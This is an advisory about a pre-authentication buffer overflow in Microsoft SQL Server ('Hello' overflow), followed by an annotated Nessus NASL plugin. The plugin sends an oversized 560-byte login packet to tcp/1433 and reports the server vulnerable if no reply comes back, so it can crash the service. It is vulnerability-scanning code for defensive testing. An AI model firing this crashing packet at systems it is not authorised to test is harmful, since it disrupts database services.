
source: https://www.securityfocus.com/bid/5411/info
A vulnerability has been discovered in Microsoft SQL Server that could make it possible for remote attackers to gain access to target hosts.
It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process.
This vulnerability reportedly occurs even before authentication can proceed.
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
# This is a NASL (Nessus Attack Scripting Language) plugin, not C, despite
# the page's language tag.
#
# How the check works: one oversized pre-built packet is sent to tcp/1433
# and the ABSENCE of any reply is taken as "vulnerable". The script is
# registered as ACT_ATTACK (see script_category below) because an affected
# service may stop responding; it is not a safe check to run against
# production hosts, and a patched host produces no finding at all.
#
#TODO:
#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


# Plugin registration block: the scanner evaluates this with `description`
# set, records the metadata below, and leaves via exit(0) before any of the
# network code further down is reached.
if(description)
{
script_id(11067);
# NOTE(review): the commented-out CVE id below appears to predate this 2002
# finding and may refer to a different SQL Server issue -- verify the correct
# identifier (see the securityfocus BID referenced at the top of the file)
# before enabling it.
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);

# User-facing finding text. The same wording is duplicated in the `report`
# variable in the scan code below; keep the two in sync if either is edited.
# NOTE(review): "disable this service" is the only remediation given here;
# the vendor fix referenced by the advisory is the usual remediation -- confirm
# against the referenced BID.
desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);

# ACT_ATTACK: this plugin may disrupt the target service, so scanners
# schedule it only when "safe checks" are disabled.
script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
# Only tcp/1433 is probed; the UDP 1434 resolver (which can advertise
# instances on other ports) is not consulted -- see the TODO above.
script_require_ports(1433);
exit(0);
}

#
# The script code starts here
#
# Fixed packet prefix copied from mssql.spk. The variable-length
# attack_string is spliced between pkt_hdr and pkt_tail below; nothing in
# the header is recomputed afterwards.
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

# Fixed packet suffix, also copied from mssql.spk.
#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
# Hard-coded port; an instance listening elsewhere is never tested.
port = 1433;
# NOTE: `found` is assigned here but never read anywhere in the script;
# it is a harmless leftover.
found = 0;
# Report text passed to security_hole() when the check fires. It repeats
# desc["english"] from the registration block verbatim.
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


# get_port_state() presumably reports whether the port scan found tcp/1433
# open; a closed port is skipped without attempting a connection.
if(get_port_state(port))
{
soc = open_sock_tcp(port);

# A failed connect is silently ignored -- no error is logged and no
# finding is raised, which is the intended "not vulnerable / not reachable"
# outcome for this check.
if(soc)
{
# The commented-out "MSSQLServer" value is the benign control case that
# exercises the same packet layout without the oversized field; the live
# line below substitutes a 560-byte filler built by crap().
#uncomment this to see what normally happens
#attack_string="MSSQLServer";
#uncomment next line to actually test for overflow
attack_string=crap(560);
# this creates a variable called sql_packet
sql_packet = pkt_hdr+attack_string+pkt_tail;
send(socket:soc, data:sql_packet);

# Single read with the scanner's default timeout; no retry.
r = recv(socket:soc, length:4096);
close(soc);
# Debug output to the scanner console; harmless but noisy for a
# production plugin.
display ("Result:",r,"\n");
# Detection signal is the ABSENCE of a reply. A read timeout, a firewall
# silently dropping the session, or a server that closes the connection
# without answering all look identical to a crashed service here, so this
# check is prone to false positives. A more reliable version would first
# confirm that the benign packet gets a reply from the same host, so that
# "no reply" is only counted when the service is otherwise responsive.
if(!r)
{
display("Security Hole in MSSQL\n");
security_hole(port:port, data:report);
}
}
}